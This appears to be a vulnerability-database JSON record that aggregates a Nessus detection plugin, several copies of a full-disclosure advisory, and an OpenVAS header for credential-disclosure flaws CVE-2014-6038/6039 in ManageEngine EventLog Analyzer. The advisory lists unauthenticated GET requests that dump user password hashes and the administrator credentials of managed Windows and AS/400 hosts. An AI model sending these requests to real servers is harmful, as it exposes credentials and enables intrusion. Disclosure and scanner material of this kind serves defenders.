(CVE-2014-6039)\n\nNote that Nessus only checked for the flaw outlined by CVE-2014-6038;\nhowever, it is highly likely that the version is also affected by the\nflaw outlined in CVE-2014-6039.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.manageengine.com/products/eventlog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2014/Nov/32\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 10 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_eventlog_analyzer\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_eventlog_analyzer_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine EventLog Analyzer\");\n script_require_ports(\"Services/www\", 8400);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"ManageEngine EventLog Analyzer\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8400);\ninst = get_single_install(app_name:app,port:port);\nurl = build_url(port:port, qs:inst[\"path\"]);\nitem = \"/agentHandler?mode=getTableData&table=AaaUser\";\nres = http_send_recv3(\n method : \"GET\",\n item : item,\n port : port\n);\nreq = build_url(qs:item, port:port);\n\n# Patch host simply responds \"Access Denied\"\nif(res[2] =~ \"<Details>.*<\\/Details>\")\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n request : make_list(req),\n output : data_protection::sanitize_user_full_redaction(output:chomp(res[2]))\n );\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED,app,url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:41", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-06T00:00:00", "published": "2014-11-06T00:00:00", "href": "https://packetstormsecurity.com/files/128996/ManageEngine-EventLog-Analyzer-SQL-Credential-Disclosure.html", "id": "PACKETSTORM:128996", "type": "packetstorm", "title": "ManageEngine EventLog Analyzer SQL / Credential Disclosure", "sourceData": "`Hi, \n \nThis is the 6th part of the ManageOwnage series. For previous parts see [1]. 
\n \nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be \nabused to dump information from the database and obtain the superuser \ncredentials for Windows and AS/400 hosts which are managed by EventLog \nAnalyzer. A Metasploit module has also been released and should be \nintegrated in the framework in the next few days [2]. \n \nI'm releasing these as a 0 day since it's been 70 days since I \ninformed ManageEngine of this vulnerability and they have been \ntwiddling their thumbs ever since. The last update I got was that they \nwere \"working on fixing it but couldn't commit to a date; the \ntentative date is end of the year\". \nSince they have been vulnerable to a more serious remote code \nexecution 0 day for 67 days now (see [3]), I'm not holding this any \nlonger. \n \nDetails and timeline of disclosure are below, and a copy of this \nadvisory can be found at my repo [4]. \n \nRegards, \nPedro \n \n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 05/11/2014 / Last updated: 05/11/2014 \n \n>> Background on the affected product: \n\"EventLog Analyzer provides the most cost-effective Security \nInformation and Event Management (SIEM) software on the market. Using \nthis Log Analyzer software, organizations can automate the entire \nprocess of managing terabytes of machine generated logs by collecting, \nanalyzing, correlating, searching, reporting, and archiving from one \ncentral location. 
This event log analyzer software helps to monitor \nfile integrity, conduct log forensics analysis, monitor privileged \nusers and comply to different compliance regulatory bodies by \nintelligently analyzing your logs and instantly generating a variety \nof reports like user activity reports, historical trend reports, and \nmore.\" \n \nA Metasploit exploit that abuses these two vulnerabilities to obtain \nthe managed device superuser credentials has been released. \n \n#1 \nVulnerability: SQL database information disclosure (read any table in \nthe database) \nCVE-2014-6038 \nConstraints: none; no authentication or any other information needed. \nOn v7 the url has to be prepended with /event/. \nAffected versions: all versions from v7 to v9.9 build 9002. \n \nGET /agentHandler?mode=getTableData&table=[tableName] \nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins \nGET /agentHandler?mode=getTableData&table=AaaPassword --> user \npasswords (MD5 hashed) and salts \nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user \npassword hints \nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / \nAS/400 managed hosts Administrator usernames and passwords (XOR'ed \nwith 0x30) \n \n \n#2 \nVulnerability: Windows / AS/400 managed hosts Administrator \ncredentials disclosure \nCVE-2014-6039 \nConstraints: none; no authentication or any other information needed. \nOn v7 the url has to be prepended with /event/. \nAffected versions: all versions from v7 to v9.9 build 9002. \n \nGET /hostdetails?slid=X&hostid=Y \nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser \nusername and password (XOR'ed with 0x30 and base64 encoded) \n \n \n>> Fix: \nUNFIXED - ManageEngine failed to take action after 70 days. 
\n \nTimeline of disclosure: \n28/08/2014 \n- Requested contact to email via ManageEngine Security Response Center \n- Received email from support and sent details about the \nvulnerabilities above and a third vulnerability (remote code execution \nvia file upload). \n \n28/08/2014 \n- ManageEngine acknowledge the receipt and promise to keep me informed \nof the progress. \n \n31/08/2014 \n- hong10 releases details about the remote code execution via file \nupload vulnerability which I had discovered. Apparently he discovered \nand communicated it to ManageEngine over a year ago and no action had \nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86). \n- I ask ManageEngine why I hadn't been informed that one of my \nvulnerabilities had already been disclosed to them over a year ago. \nThey respond with \"We appreciate your efforts and will fix your \nvulnerabilities, please bear with us\". \n- With hong10's support, I release an exploit for the remote code \nexecution vulnerability (see \nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the \nvulnerability information from this report since it has already been \ndiscovered and disclosed by hong10. \n \n11/09/2014 \n- Asked for an update on progress. Received a response a day after \n\"the development team will include the fix in our next release\". \n \n13/10/2014 \n- Asked for an update on progress. No response. \n \n17/10/2014 \n- Informed ManageEngine that will release details and an exploit the \nnext day if no reply is received. \n \n19/10/2014 \n- Attempted escalation via the project manager for Desktop Central. \nEventLog support team replies on the next day apologising for not \nresponding and saying will get back to me as soon as possible. \n \n05/11/2014 \n- Informed EventLog support that would release details and exploit \ntoday. Received reply stating \"we are working on this but cannot \ncommit to a date; the new version has a tentative release date of end \nof quarter\". 
\n- Released advisory and exploit 70 days after initial contact \n(interesting fact: it's been 67 days since the release of my exploit \nfor hong10's vulnerability and EventLog Analyzer is still vulnerable \nto remote code execution). \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4137 \n \n[3] \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \n \n[4] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/128996/manageengineea-disclose.txt"}], "zdt": [{"lastseen": "2018-01-03T01:00:04", "bulletinFamily": "exploit", "description": "ManageEngine EventLog Analyzer suffers from SQL information and credential disclosure vulnerabilities.", "modified": "2014-11-06T00:00:00", "published": "2014-11-06T00:00:00", "id": "1337DAY-ID-22829", "href": "https://0day.today/exploit/description/22829", "type": "zdt", "title": "ManageEngine EventLog Analyzer SQL / Credential Disclosure", "sourceData": "This is the 6th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be\r\nabused to dump information from the database and obtain the superuser\r\ncredentials for Windows and AS/400 hosts which are managed by EventLog\r\nAnalyzer. A Metasploit module has also been released and should be\r\nintegrated in the framework in the next few days [2].\r\n\r\nI'm releasing these as a 0 day since it's been 70 days since I\r\ninformed ManageEngine of this vulnerability and they have been\r\ntwiddling their thumbs ever since. 
The last update I got was that they\r\nwere \"working on fixing it but couldn't commit to a date; the\r\ntentative date is end of the year\".\r\nSince they have been vulnerable to a more serious remote code\r\nexecution 0 day for 67 days now (see [3]), I'm not holding this any\r\nlonger.\r\n\r\nDetails and timeline of disclosure are below, and a copy of this\r\nadvisory can be found at my repo [4].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security\r\nInformation and Event Management (SIEM) software on the market. Using\r\nthis Log Analyzer software, organizations can automate the entire\r\nprocess of managing terabytes of machine generated logs by collecting,\r\nanalyzing, correlating, searching, reporting, and archiving from one\r\ncentral location. 
This event log analyzer software helps to monitor\r\nfile integrity, conduct log forensics analysis, monitor privileged\r\nusers and comply to different compliance regulatory bodies by\r\nintelligently analyzing your logs and instantly generating a variety\r\nof reports like user activity reports, historical trend reports, and\r\nmore.\"\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain\r\nthe managed device superuser credentials has been released.\r\n\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in\r\nthe database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user\r\npasswords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user\r\npassword hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows /\r\nAS/400 managed hosts Administrator usernames and passwords (XOR'ed\r\nwith 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator\r\ncredentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser\r\nusername and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014\r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about 
the\r\nvulnerabilities above and a third vulnerability (remote code execution\r\nvia file upload).\r\n\r\n28/08/2014\r\n- ManageEngine acknowledge the receipt and promise to keep me informed\r\nof the progress.\r\n\r\n31/08/2014\r\n- hong10 releases details about the remote code execution via file\r\nupload vulnerability which I had discovered. Apparently he discovered\r\nand communicated it to ManageEngine over a year ago and no action had\r\nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my\r\nvulnerabilities had already been disclosed to them over a year ago.\r\nThey respond with \"We appreciate your efforts and will fix your\r\nvulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code\r\nexecution vulnerability (see\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the\r\nvulnerability information from this report since it has already been\r\ndiscovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after\r\n\"the development team will include the fix in our next release\".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the\r\nnext day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central.\r\nEventLog support team replies on the next day apologising for not\r\nresponding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit\r\ntoday. 
Received reply stating \"we are working on this but cannot\r\ncommit to a date; the new version has a tentative release date of end\r\nof quarter\".\r\n- Released advisory and exploit 70 days after initial contact\r\n(interesting fact: it's been 67 days since the release of my exploit\r\nfor hong10's vulnerability and EventLog Analyzer is still vulnerable\r\nto remote code execution).\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/22829"}, {"lastseen": "2018-04-08T23:42:43", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2018-01-26T00:00:00", "published": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29644", "id": "1337DAY-ID-29644", "type": "zdt", "title": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)", "sourceData": ">> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n \r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. 
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in the database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n \r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)\r\n \r\n \r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed. 
On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n \r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)\r\n \r\n \r\nA Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.\r\n \r\n \r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n \r\nTimeline of disclosure:\r\n28/08/2014 \r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).\r\n \r\n28/08/2014 \r\n- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.\r\n \r\n31/08/2014 \r\n- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with \"We appreciate your efforts and will fix your vulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.\r\n \r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after \"the development team will include the fix in our next release\".\r\n \r\n13/10/2014\r\n- Asked for an update on progress. 
No response.\r\n \r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the next day if no reply is received.\r\n \r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.\r\n \r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit today. Received reply stating \"we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter\".\r\n- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).\r\n \r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/29644", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-01-25T18:52:47", "bulletinFamily": "exploit", "description": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2). CVE-2014-6038,CVE-2014-6039. 
Webapps exploit for Multiple platform", "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "EDB-ID:43893", "href": "https://www.exploit-db.com/exploits/43893/", "type": "exploitdb", "title": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)", "sourceData": ">> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in the database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed. 
On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014 \r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).\r\n \r\n28/08/2014 \r\n- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.\r\n \r\n31/08/2014 \r\n- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. 
Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with \"We appreciate your efforts and will fix your vulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after \"the development team will include the fix in our next release\".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the next day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit today. 
Received reply stating \"we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter\".\r\n- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).\r\n\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43893/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\nHi,\r\n\r\nThis is the 6th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be\r\nabused to dump information from the database and obtain the superuser\r\ncredentials for Windows and AS/400 hosts which are managed by EventLog\r\nAnalyzer. A Metasploit module has also been released and should be\r\nintegrated in the framework in the next few days [2].\r\n\r\nI'm releasing these as a 0 day since it's been 70 days since I\r\ninformed ManageEngine of this vulnerability and they have been\r\ntwiddling their thumbs ever since. 
The last update I got was that they\r\nwere "working on fixing it but couldn't commit to a date; the\r\ntentative date is end of the year".\r\nSince they have been vulnerable to a more serious remote code\r\nexecution 0 day for 67 days now (see [3]), I'm not holding this any\r\nlonger.\r\n\r\nDetails and timeline of disclosure are below, and a copy of this\r\nadvisory can be found at my repo [4].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n"EventLog Analyzer provides the most cost-effective Security\r\nInformation and Event Management (SIEM) software on the market. Using\r\nthis Log Analyzer software, organizations can automate the entire\r\nprocess of managing terabytes of machine generated logs by collecting,\r\nanalyzing, correlating, searching, reporting, and archiving from one\r\ncentral location. 
This event log analyzer software helps to monitor\r\nfile integrity, conduct log forensics analysis, monitor privileged\r\nusers and comply to different compliance regulatory bodies by\r\nintelligently analyzing your logs and instantly generating a variety\r\nof reports like user activity reports, historical trend reports, and\r\nmore."\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain\r\nthe managed device superuser credentials has been released.\r\n\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in\r\nthe database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user\r\npasswords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user\r\npassword hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows /\r\nAS/400 managed hosts Administrator usernames and passwords (XOR'ed\r\nwith 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator\r\ncredentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser\r\nusername and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014\r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about 
the\r\nvulnerabilities above and a third vulnerability (remote code execution\r\nvia file upload).\r\n\r\n28/08/2014\r\n- ManageEngine acknowledge the receipt and promise to keep me informed\r\nof the progress.\r\n\r\n31/08/2014\r\n- hong10 releases details about the remote code execution via file\r\nupload vulnerability which I had discovered. Apparently he discovered\r\nand communicated it to ManageEngine over a year ago and no action had\r\nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my\r\nvulnerabilities had already been disclosed to them over a year ago.\r\nThey respond with "We appreciate your efforts and will fix your\r\nvulnerabilities, please bear with us".\r\n- With hong10's support, I release an exploit for the remote code\r\nexecution vulnerability (see\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the\r\nvulnerability information from this report since it has already been\r\ndiscovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after\r\n"the development team will include the fix in our next release".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the\r\nnext day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central.\r\nEventLog support team replies on the next day apologising for not\r\nresponding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit\r\ntoday. 
Received reply stating "we are working on this but cannot\r\ncommit to a date; the new version has a tentative release date of end\r\nof quarter".\r\n- Released advisory and exploit 70 days after initial contact\r\n(interesting fact: it's been 67 days since the release of my exploit\r\nfor hong10's vulnerability and EventLog Analyzer is still vulnerable\r\nto remote code execution).\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4137\r\n\r\n[3]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\n\r\n[4]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt\r\n\r\n", "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31449", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31449", "title": "[The ManageOwnage Series, part VI]: 0day database info and superuser credential disclosure in EventLog Analyser", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14113", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14113", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:41:02", "bulletinFamily": "scanner", "description": "ManageEngine EventLog Analyzer is prone to an information disclosure 
vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2014-11-06T00:00:00", "id": "OPENVAS:1361412562310105111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105111", "title": "ManageEngine EventLog Analyzer Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_managed_engine_eventlog_analyzer_11_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# ManageEngine EventLog Analyzer Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
